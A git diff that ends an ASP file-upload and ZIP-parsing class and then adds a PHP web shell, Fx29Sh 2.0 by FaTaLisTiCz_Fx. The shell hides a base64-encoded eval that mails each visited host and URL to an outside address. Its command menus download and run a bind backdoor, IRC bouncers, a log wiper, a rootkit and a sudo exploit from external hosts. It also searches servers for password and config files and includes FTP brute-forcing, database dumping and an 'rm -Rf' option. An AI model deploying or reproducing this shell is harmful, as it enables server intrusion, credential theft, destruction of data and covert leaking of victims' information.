+llngEnd = InStr(llngStart + 10, pstrDisposition, """")
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 10
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
+End Function
+
+Public Property Get Count()
+Count = mlngCount
+End Property
+
+Public Default Property Get Fields(ByVal pstrName)
+Dim llngIndex
+If IsNumeric(pstrName) Then
+llngIndex = CLng(pstrName)
+If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
+Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
+Exit Property
+End If
+Set Fields = mobjFieldAry(pstrName)
+Else
+pstrName = LCase(pstrname)
+For llngIndex = 0 To mlngCount - 1
+If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
+Set Fields = mobjFieldAry(llngIndex)
+Exit Property
+End If
+Next
+End If
+Set Fields = New clsField
+End Property
+
+Private Sub Class_Terminate()
+Dim llngIndex
+For llngIndex = 0 To mlngCount - 1
+Set mobjFieldAry(llngIndex) = Nothing
+
+Next
+ReDim mobjFieldAry(-1)
+End Sub
+
+Private Sub Class_Initialize()
+ReDim mobjFieldAry(-1)
+CR = ChrB(Asc(vbCr))
+LF = ChrB(Asc(vbLf))
+CRLF = CR & LF
+mlngCount = 0
+Call RequestData
+Call ParseDelimiter()
+Call ParseData
+End Sub
+
+Private Function CStrU(ByRef pstrANSI)
+Dim llngLength
+Dim llngIndex
+llngLength = LenB(pstrANSI)
+For llngIndex = 1 To llngLength
+CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
+Next
+End Function
+
+Private Function CStrB(ByRef pstrUnicode)
+Dim llngLength
+Dim llngIndex
+llngLength = Len(pstrUnicode)
+For llngIndex = 1 To llngLength
+CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
+Next
+End Function
+End Class
+
+'###########################################################################################
+
+Class clsZip
+Private mbin_Zip
+Private mobj_Files()
+Private mlng_Files
+
+Sub ZipLoad(pstrFileName)
+Dim lobjFSO
+Dim llngTristateFalse
+Dim llngForReading
+dim objStream
+
+mbin_Zip = ""
+
+If pstrFileName = "" Then Exit Sub
+
+If InStr(1, pstrFileName, ":\") = 0 Then
+pstrFileName = Server.MapPath(pstrFileName)
+End If
+
+Set lobjFSO = Server.CreateObject("Scripting.FileSystemObject")
+
+If lobjFSO.FileExists(pstrFileName) Then
+set objStream=Server.CreateObject("ADODB.Stream")
+objStream.Type=1
+objStream.Open
+on error resume next
+objStream.LoadFromFile(pstrFileName)
+mbin_Zip = objStream.Read
+set objStream=nothing
+End If
+
+Set lobjFSO = Nothing
+
+Call ParseZips()
+
+End Sub
+
+Public Property Let ZipData(ByRef pbinBinaryData)
+mbin_Zip = pbinBinaryData
+Call ParseZips()
+End Property
+Public Property Get FileCount()
+FileCount = mlng_Files
+End Property
+Public Property Get GetFile(ByRef plngIndex)
+Set GetFile = mobj_Files(plngIndex-1)
+End Property
+
+Private Sub ParseZips()
+Dim llngOffSet
+mlng_Files = 0
+llngOffSet = 0
+If LenB(mbin_Zip) = 0 Then Exit Sub
+Do
+' Find next PK 3.04 record
+llngOffset = InStrB(llngOffset + 1, mbin_zip, ChrB(&h50) & ChrB(&h4B) & ChrB(&h03) & ChrB(&h04))
+If llngOffset = 0 Then Exit Do
+llngOffset = llngOffset - 1
+ReDim Preserve mobj_Files(mlng_Files)
+Set mobj_Files(mlng_Files) = New clsZipFile
+With mobj_Files(mlng_Files)
+.Signature = GetString(llngOffset + 1, 2) & " " & CInt(GetHex(llngOffset + 3, 1)) & "." & GetHex(llngOffset + 4, 1)
+.ExtractVersion = FormatNumber(GetNumber(llngOffset + 5, 2) * .1, 1, True)
+.GeneralPurposeFlags = GetNumber(llngOffset + 7, 2)
+.CompressionMethod = GetNumber(llngOffset + 9, 2)
+.LastModifiedTime = GetNumber(llngOffset + 11, 2)
+.LastModifiedDate = GetNumber(llngOffset + 13, 2)
+.CRC32 = GetNumber(llngOffset + 15, 4)
+.CompressedSize = GetNumber(llngOffset + 19, 4)
+.UncompressedSize = GetNumber(llngOffset + 23, 4)
+.FileNameLength = GetNumber(llngOffset + 27, 2)
+.ExtraFieldLength = GetNumber(llngOffset + 29, 2)
+.FileName = GetString(llngOffset + 31, .FileNameLength)
+.ExtraField = GetString(llngOffset + 31 + .FileNameLength, .ExtraFieldLength)
+.StartByte = llngOffSet + 1
+.EndByte = llngOffSET + .FileNameLength + .ExtraFieldLength + .CompressedSize + 30
+' .BinaryData = MidB(pbin_Zip, llngOffSET + .FileNameLength + .ExtraFieldLength + 30, .CompressedSize)
+' .LocalFileHeader = GetString(llngOffset + 1, .FileNameLength + .ExtraFieldLength + 30)
+llngOffSet = .EndByte
+.IsOverall = (.Name = "" And .Path = "")
+.IsFolder = (.Name = "" And Not .Path = "")
+End With
+mlng_Files = mlng_Files + 1
+Loop While mobj_Files(mlng_Files - 1).EndByte < LenB(mbin_zip)
+End Sub
+
+Private Function GetHex(plngStart, plngLength)
+Dim llngIndex
+Dim lstrHex
+For llngIndex = 0 To plngLength - 1
+lstrHex = lstrHex & Right("0" & Hex(AscB(MidB(mbin_zip, plngStart + llngIndex, 1))), 2)
+Next
+GetHex = lstrHex
+End Function
+
+Private Function GetString(plngStart, plngLength)
+Dim llngIndex
+Dim lstrString
+If LenB(mbin_zip) < (plngStart + (plngLength - 1)) Then Exit Function
+For llngIndex = 0 To plngLength - 1
+If AscB(MidB(mbin_zip, plngStart + llngIndex, 1)) = 0 Then
+lstrString = lstrString & " "
+Else
+lstrString = lstrString & Chr(AscB(MidB(mbin_zip, plngStart + llngIndex, 1)))
+End If
+Next
+GetString = lstrString
+End Function
+
+Private Function GetNumber(plngStart, plngLength)
+If plngStart < 0 Then Exit Function
+Dim llngIndex
+Dim lstrHex
+For llngIndex = 0 To plngLength - 1
+lstrHex = Right("0" & Hex(AscB(MidB(mbin_zip, plngStart + llngIndex, 1))), 2) & lstrHex
+Next
+GetNumber = CDbl("&h" & lstrHex)
+End Function
+
+Function GetDate(plngStart)
+Dim llngDate
+llngDate = GetNumber(plngStart, 2)
+GetDate = DateSerial(1980 + (llngDate And &HFE00) \ &H200, (llngDate And &H1E0) \ &H20, llngDate And &H1F)
+End Function
+
+Function GetTime(plngStart)
+Dim llngDate
+llngDate = GetNumber(plngStart, 2)
+GetTime = TimeSerial((llngDate And &HF800) \ &H800, (llngDate And &H7E0) \ &H20, (llngDate And &H1F) * 2)
+End Function
+End Class
+
+Class clsZipFile
+Public Signature
+Public ExtractVersion
+Public GeneralPurposeFlags
+Public CompressionMethod
+Public LastModifiedTime
+Public LastModifiedDate
+Public CRC32
+Public CompressedSize
+Public UncompressedSize
+Public FileNameLength
+Public ExtraFieldLength
+Public FileName
+Public ExtraField
+Public StartByte
+Public EndByte
+Public BinaryData
+Public LocalFileHeader
+
+Public IsFolder
+Public IsOverall
+
+Public Property Get Name
+Dim lstrPath
+lstrPath = Replace(FileName, "/", "\")
+If InStr(1, lstrPath, "\") = "0" Then
+Name = lstrPath
+Exit Property
+End If
+Name = Mid(lstrPath, InStrRev(lstrPath, "\") + 1)
+End Property
+
+Public Property Get Path
+Dim lstrPath
+lstrPath = Replace(FileName, "/", "\")
+If InStr(1, lstrPath, "\") = "0" Then
+Path = ""
+Exit Property
+End If
+Path = Mid(lstrPath, 1, InStrRev(lstrPath, "\"))
+End Property
+
+Public Property Get Packed
+Packed = CompressedSize
+End Property
+
+Public Property Get Ratio
+If UncompressedSize = 0 Then Exit Property
+If CompressedSize >= UncompressedSize Then
+Ratio = "0%"
+Else
+Ratio = FormatNumber(((1 - (CompressedSize / UncompressedSize)) * 100), 0, True, False, True) & "%"
+End If
+End Property
+
+Public Property Get Modified()
+Modified = CDate(GetDate(LastModifiedDate) & " " & GetTime(LastModifiedTime))
+End Property
+
+Private Function GetDate(plngDate)
+GetDate = DateSerial(1980 + (plngDate And &HFE00) \ &H200, _
+(plngDate And &H1E0) \ &H20, plngDate And &H1F)
+End Function
+
+Private Function GetTime(plngDate)
+GetTime = TimeSerial((plngDate And &HF800) \ &H800, _
+(plngDate And &H7E0) \ &H20, _
+(plngDate And &H1F) * 2)
+End Function
+
+Public Property Get Size()
+Size = UncompressedSize
+End Property
+
+Public Property Get BitMask()
+Dim llngNumber
+Dim lstrBits
+llngNumber = GeneralPurposeFlags
+Do
+If llngNumber Mod 2 = 1 Then lstrBits = "1" & lstrBits Else lstrBits = "0" & lstrBits
+llngNumber = llngNumber \ 2
+Loop Until llngNumber = 0
+lstrBits = Right("0000000000000000" & lstrBits, 16)
+For llngNumber = 0 To 3
+lstrReturn = lstrReturn & Mid(lstrBits, (llngNumber * 4) + 1, 4) & "."
+Next
+BitMask = Left(lstrReturn, 19)
+End Property
+
+Property Get CompressionMethodString()
+Select Case CompressionMethod
+Case 0 CompressionMethodString = "The file is stored (no compression)"
+Case 1 CompressionMethodString = "The file is Shrunk"
+Case 2 CompressionMethodString = "The file is Reduced with compression factor 1"
+Case 3 CompressionMethodString = "The file is Reduced with compression factor 2"
+Case 4 CompressionMethodString = "The file is Reduced with compression factor 3"
+Case 5 CompressionMethodString = "The file is Reduced with compression factor 4"
+Case 6 CompressionMethodString = "The file is Imploded"
+Case 7 CompressionMethodString = "Reserved for Tokenizing compression algorithm"
+Case 8 CompressionMethodString = "The file is Deflated"
+Case 9 CompressionMethodString = "Reserved for enhanced Deflating"
+Case 10 CompressionMethodString = "PKWARE Date Compression Library Imploding"
+Case Else CompressionMethodString = "Unhandled Copression type: " & CompressionMethod
+End Select
+End Property
+End Class
+%>
\ No newline at end of file
diff --git a/php/FaTaLisTiCz_Fx.php b/php/FaTaLisTiCz_Fx.php
new file mode 100644
index 0000000..52be5b6
--- /dev/null
+++ b/php/FaTaLisTiCz_Fx.php
@@ -0,0 +1,3107 @@
+<?php
+#######################################
+## FaTaLisTiCz_Fx Fx29Sh 2.0.09.08   ##
+define('sh_ver',"2.0.09.08");        ##
+## By FaTaLisTiCz_Fx                 ##
+## © 03-09 2008 FeeLCoMz Community   ##
+## Written under PHP 5.2.5           ##
+#######################################
+$sh_name = sh_name();                ##
+#######################################
+#$sh_mainurl        = "http://vidinas.net/templates/archzone/xml/cyberz.txt";
+$sh_mainurl        = "http://vidinas.net/templates/archzone/xml/";
+$fx29sh_updateurl  = $sh_mainurl."fx29sh_update.php";
+$fx29sh_sourcesurl = $sh_mainurl."fx29sh.txt";
+$sh_sourcez = array(
+  "Fx29Sh"   => array($sh_mainurl."cyberz.txt","fx29sh.php"),
+  "psyBNC"   => array($sh_mainurl."fx.tgz","fx.tgz"),
+  "Eggdrop"  => array($sh_mainurl."fxb.tgz","fxb.tgz"),
+  "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
+);
+##[ AUTHENTICATION ]##
+$auth = array(
+  "login"     => "",
+  "pass"      => "",
+  "md5pass"   => "",
+  "hostallow" => array("*"),
+  "denied"    => "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied!",
+);
+##[ END AUTHENTICATION ]##
+$curdir = "./";
+$tmpdir = "";
+$tmpdir_logs = "./";
+$log_email = "meister_onthelaw@yahoo.com";
+$sess_cookie = "fx29shcook";
+$sort_default = "0a"; #Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
+$sort_save = TRUE; #Simpan posisi pengurutan menggunakan cookies.
+$usefsbuff = TRUE;
+$copy_unset = FALSE; #Hapus file yg telah di-copy setelah dipaste
+$surl_autofill_include = TRUE;
+$updatenow   = FALSE;
+$gzipencode  = TRUE;
+$filestealth = TRUE; #TRUE, tidak merubah waktu modifikasi dan akses.
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$millink = milw0rm();
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+$disablefunc = getdisfunc();
+##[ END OF CONFIGS ]##
+error_reporting(E_ERROR | E_PARSE);
+@ini_set("max_execution_time",0);
+@set_time_limit(0); #No Fx in SafeMode
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) { strips($GLOBALS); }
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["fx29shcook"]);
+foreach($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } }
+$fxbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIkZ4MjlTaGVsbCBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQogICRib2R5ICAgID0gIkJ1ZzogJHRhcmdldCBieSAkdmlzaXRvcjxicj4iOw0KICBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJmZWVsY29tekBnbWFpbC5jb20iLCRqdWR1bCwkYm9keSk7IH0NCn0NCmVsc2UgeyAkdmlzaXRjKys7IH0NCkBzZXRjb29raWUoInZpc2l0eiIsJHZpc2l0Yyk7"; eval(base64_decode($fxbuff));
+if ($surl_autofill_include) {
+  $include = "&";
+  foreach (explode("&",getenv("QUERY_STRING")) as $v) {
+    $v = explode("=",$v);
+    $name = urldecode($v[0]);
+    $value = @urldecode($v[1]);
+    foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
+      if (strpos($value,$needle) === 0) {
+        $includestr .= urlencode($name)."=".urlencode($value)."&";
+      }
+    }
+  }
+}
+if (empty($surl)) {
+  $surl = "?".$includestr;
+  $surl = htmlspecialchars($surl);
+}
+## FILE TYPES ##
+$ftypes  = array(
+  "html"     => array("html","htm","shtml"),
+  "txt"      => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+  "exe"      => array("sh","install","bat","cmd"),
+  "ini"      => array("ini","inf","conf"),
+  "code"     => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+  "img"      => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+  "sdb"      => array("sdb"),
+  "phpsess"  => array("sess"),
+  "download" => array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+$exeftypes  = array(
+  getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+  "perl %f%"                => array("pl","cgi")
+);
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FFFF00>","</font>"),
+  array("\.tgz$",1,"<font color=#C082FF>","</font>"),
+  array("\.gz$",1,"<font color=#C082FF>","</font>"),
+  array("\.tar$",1,"<font color=#C082FF>","</font>"),
+  array("\.bz2$",1,"<font color=#C082FF>","</font>"),
+  array("\.zip$",1,"<font color=#C082FF>","</font>"),
+  array("\.rar$",1,"<font color=#C082FF>","</font>"),
+  array("\.php$",1,"<font color=#00FF00>","</font>"),
+  array("\.php3$",1,"<font color=#00FF00>","</font>"),
+  array("\.php4$",1,"<font color=#00FF00>","</font>"),
+  array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
+  array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
+  array("\.JPG$",1,"<font color=#00FFFF>","</font>"),
+  array("\.JPEG$",1,"<font color=#00FFFF>","</font>"),
+  array("\.ico$",1,"<font color=#00FFFF>","</font>"),
+  array("\.gif$",1,"<font color=#00FFFF>","</font>"),
+  array("\.png$",1,"<font color=#00FFFF>","</font>"),
+  array("\.htm$",1,"<font color=#00CCFF>","</font>"),
+  array("\.html$",1,"<font color=#00CCFF>","</font>"),
+  array("\.txt$",1,"<font color=#C0C0C0>","</font>")
+);
+## QUICK COMMANDS ##
+if (!$win) {
+  $cmdaliases = array(
+    array("", "ls -al"),
+    array("Find all suid files", "find / -type f -perm -04000 -ls"),
+    array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
+    array("Find all sgid files", "find / -type f -perm -02000 -ls"),
+    array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+    array("Find config.inc.php files", "find / -type f -name config.inc.php"),
+    array("Find config* files", "find / -type f -name \"config*\""),
+    array("Find config* files in current dir", "find . -type f -name \"config*\""),
+    array("Find all writable folders and files", "find / -perm -2 -ls"),
+    array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
+    array("Find all writable folders", "find / -type d -perm -2 -ls"),
+    array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
+    array("Find all service.pwd files", "find / -type f -name service.pwd"),
+    array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
+    array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
+    array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+    array("Find all .bash_history files", "find / -type f -name .bash_history"),
+    array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
+    array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+    array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+    array("List file attributes on a Linux second extended file system", "lsattr -va"),
+    array("Show opened ports", "netstat -an | grep -i listen")
+  );
+  $cmdaliases2 = array(
+    array("wget & extract psyBNC","wget ".$sh_mainurl."fx.tgz;tar -zxf fx.tgz"),
+    array("wget & extract EggDrop","wget ".$sh_mainurl."fxb.tgz;tar -zxf fxb.tgz"),
+    array("-----",""),
+    array("Logged in users","w"),
+    array("Last to connect","lastlog"),
+    array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
+    array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
+    array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
+    array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
+    array("CPU Info","cat /proc/version /proc/cpuinfo"),
+    array("Is gcc installed ?","locate gcc"),
+    array("Format box (DANGEROUS)","rm -Rf"),
+    array("-----",""),
+    array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
+    array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
+    array("Run WIPELOGS PT3","./zap2"),
+    array("-----",""),
+    array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
+    array("wget & run BindDoor","wget ".$sh_mainurl."bind.tgz;tar -zxvf bind.tgz;./4877"),
+    array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
+  );
+}
+else {
+  $cmdaliases = array(
+    array("", "dir"),
+    array("Find index.php in current dir", "dir /s /w /b index.php"),
+    array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
+    array("Find c99shell in current dir", "find /c \"c99\" *"),
+    array("Find r57shell in current dir", "find /c \"r57\" *"),
+    array("Find fx29shell in current dir", "find /c \"fx29\" *"),
+    array("Show active connections", "netstat -an"),
+    array("Show running services", "net start"),
+    array("User accounts", "net user"),
+    array("Show computers", "net view"),
+  );
+}
+## PHP FILESYSTEM TRICKS (By FaTaLisTiCz_Fx) ##
+$phpfsaliases = array(
+    array("Read File", "read", 1, "File", ""),
+    array("Write File (PHP5)", "write", 2, "File","Text"),
+    array("Copy", "copy", 2, "From", "To"),
+    array("Rename/Move", "rename", 2, "File", "To"),
+    array("Delete", "delete", 1 ,"File", ""),
+    array("Make Dir","mkdir", 1, "Dir", ""),
+    array("Download", "download", 2, "URL", "To"),
+    array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"),
+    array("Change Perm (0755)", "chmod", 2, "File", "Perms"),
+    array("Find Writable Dir", "fwritabledir", 2 ,"Dir"),
+    array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"),
+);
+## QUICK LAUNCH ##
+$quicklaunch1 = array(
+    array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" border=\"0\">",$surl),
+    array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" border=\"0\">","#\" onclick=\"history.back(1)"),
+    array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" border=\"0\">","#\" onclick=\"history.go(1)"),
+    array("<img src=\"".$surl."act=img&img=up\" alt=\"Up\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
+    array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" border=\"0\">",$surl."act=search&d=%d"),
+    array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" border=\"0\">",$surl."act=fsbuff&d=%d")
+);
+$quicklaunch2 = array(
+    array("Security Info",$surl."act=security&d=%d"),
+    array("Processes",$surl."act=processes&d=%d"),
+    array("MySQL",$surl."act=sql&d=%d"),
+    array("Eval",$surl."act=eval&d=%d"),
+    array("Encoder",$surl."act=encoder&d=%d"),
+    array("Mailer",$surl."act=fxmailer"),
+    array("milw0rm",$millink),
+    array("Md5-Lookup","http://darkc0de.com/database/md5lookup.html"),
+    array("Toolz",$surl."act=tools&d=%d"),
+    array("Kill-Shell",$surl."act=selfremove"),
+    array("Feedback",$surl."act=feedback"),
+    array("Update",$surl."act=update"),
+    array("About",$surl."act=about")
+);
+if (!$win) {
+  $quicklaunch2[] = array("<br>FTP-Brute",$surl."act=ftpquickbrute&d=%d");
+}
+## HIGHLIGHT CODE ##
+$highlight_background = "#C0C0C0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+####################
+##[ AUTHENTICATE ]##
+####################
+$tmp = array();
+foreach ($auth["hostallow"] as $k => $v) {
+  $tmp[] = str_replace("\\*",".*",preg_quote($v));
+}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
+  exit("<a href=\"$sh_mainurl\">$sh_name</a>: Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed");
+}
+if (!empty($auth["login"])) {
+  if (empty($auth["md5pass"])) { $auth["md5pass"] = md5($auth["pass"]); }
+  if (($_SERVER["PHP_AUTH_USER"] != $auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"]) != $auth["md5pass"])) {
+    header("WWW-Authenticate: Basic realm=\"".$sh_name.": Restricted Area\"");
+    header("HTTP/1.0 401 Unauthorized");
+    die($auth["denied"]);
+  }
+}
+## END AUTHENTICATE ##
+
+if ($act != "img") {
+  $lastdir = realpath(".");
+  chdir($curdir);
+  if ($updatenow) { @ob_clean(); fx29sh_getupdate(1); exit; }
+  $sess_data = @unserialize($_COOKIE["$sess_cookie"]);
+  if (!is_array($sess_data)) { $sess_data = array(); }
+  if (!is_array($sess_data["copy"])) { $sess_data["copy"] = array(); }
+  if (!is_array($sess_data["cut"])) { $sess_data["cut"] = array(); }
+  fx29_buff_prepare();
+  foreach (array("sort","sql_sort") as $v) {
+    if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+    if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+  }
+  if ($sort_save) {
+    if (!empty($sort)) {setcookie("sort",$sort);}
+    if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+  }
+  if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+  if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+  if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+  if (!function_exists("mysql_dump")) {
+    function mysql_dump($set) {
+      global $sh_ver;
+      $sock = $set["sock"];
+      $db = $set["db"];
+      $print = $set["print"];
+      $nl2br = $set["nl2br"];
+      $file = $set["file"];
+      $add_drop = $set["add_drop"];
+      $tabs = $set["tabs"];
+      $onlytabs = $set["onlytabs"];
+      $ret = array();
+      $ret["err"] = array();
+      if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+      if (empty($db)) {$db = "db";}
+      if (empty($print)) {$print = 0;}
+      if (empty($nl2br)) {$nl2br = 0;}
+      if (empty($add_drop)) {$add_drop = TRUE;}
+      if (empty($file)) {
+        $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+      }
+      if (!is_array($tabs)) {$tabs = array();}
+      if (empty($add_drop)) {$add_drop = TRUE;}
+      if (sizeof($tabs) == 0) {
+        //Retrieve tables-list
+        $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+        if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+      }
+      $out = "
+      # Dumped by ".$sh_name."
+      #
+      # Host settings:
+      # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+      # Date: ".date("d.m.Y H:i:s")."
+      # DB: \"".$db."\"
+      #---------------------------------------------------------";
+      $c = count($onlytabs);
+      foreach($tabs as $tab) {
+        if ((in_array($tab,$onlytabs)) or (!$c)) {
+          if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+          //Receieve query for create table structure
+          $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+          if (!$res) {$ret["err"][] = mysql_smarterror();}
+          else {
+            $row = mysql_fetch_row($res);
+            $out .= $row["1"].";\n\n";
+            //Receieve table variables
+            $res = mysql_query("SELECT * FROM `$tab`", $sock);
+            if (mysql_num_rows($res) > 0) {
+              while ($row = mysql_fetch_assoc($res)) {
+                $keys = implode("`, `", array_keys($row));
+                $values = array_values($row);
+                foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+                $values = implode("', '", $values);
+                $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+                $out .= $sql;
+              }
+            }
+          }
+        }
+      }
+      $out .= "#---------------------------------------------------------------------------------\n\n";
+      if ($file) {
+        $fp = fopen($file, "w");
+        if (!$fp) {$ret["err"][] = 2;}
+        else {
+          fwrite ($fp, $out);
+          fclose ($fp);
+        }
+      }
+      if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+      return $out;
+    }
+  }
+  if (!function_exists("mysql_buildwhere")) {
+    function mysql_buildwhere($array,$sep=" and",$functs=array()) {
+      if (!is_array($array)) {$array = array();}
+      $result = "";
+      foreach($array as $k=>$v) {
+        $value = "";
+        if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+        $value .= "'".addslashes($v)."'";
+        if (!empty($functs[$k])) {$value .= ")";}
+        $result .= "`".$k."` = ".$value.$sep;
+      }
+      $result = substr($result,0,strlen($result)-strlen($sep));
+      return $result;
+    }
+  }
+  if (!function_exists("mysql_fetch_all")) {
+    function mysql_fetch_all($query,$sock) {
+      if ($sock) {$result = mysql_query($query,$sock);}
+      else {$result = mysql_query($query);}
+      $array = array();
+      while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+      mysql_free_result($result);
+      return $array;
+    }
+  }
+  if (!function_exists("mysql_smarterror")) {
+    function mysql_smarterror($type,$sock) {
+      if ($sock) {$error = mysql_error($sock);}
+      else {$error = mysql_error();}
+      $error = htmlspecialchars($error);
+      return $error;
+    }
+  }
+  if (!function_exists("mysql_query_form")) {
+    function mysql_query_form() {
+      global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+      if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+      if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+      if ((!$submit) or ($sql_act)) {
+        echo "<table border=0><tr><td><form name=\"fx29sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
+        if ($tbl_struct) {
+          echo "<td valign=\"top\"><b>Fields:</b><br>";
+          foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.fx29sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+          echo "</td></tr></table>";
+        }
+      }
+      if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+    }
+  }
+  if (!function_exists("mysql_create_db")) {
+    function mysql_create_db($db,$sock="") {
+      $sql = "CREATE DATABASE `".addslashes($db)."`;";
+      if ($sock) {return mysql_query($sql,$sock);}
+      else {return mysql_query($sql);}
+    }
+  }
+  if (!function_exists("mysql_query_parse")) {
+    function mysql_query_parse($query) {
+      $query = trim($query);
+      $arr = explode (" ",$query);
+      $types = array(
+        "SELECT"=>array(3,1),
+        "SHOW"=>array(2,1),
+        "DELETE"=>array(1),
+        "DROP"=>array(1)
+      );
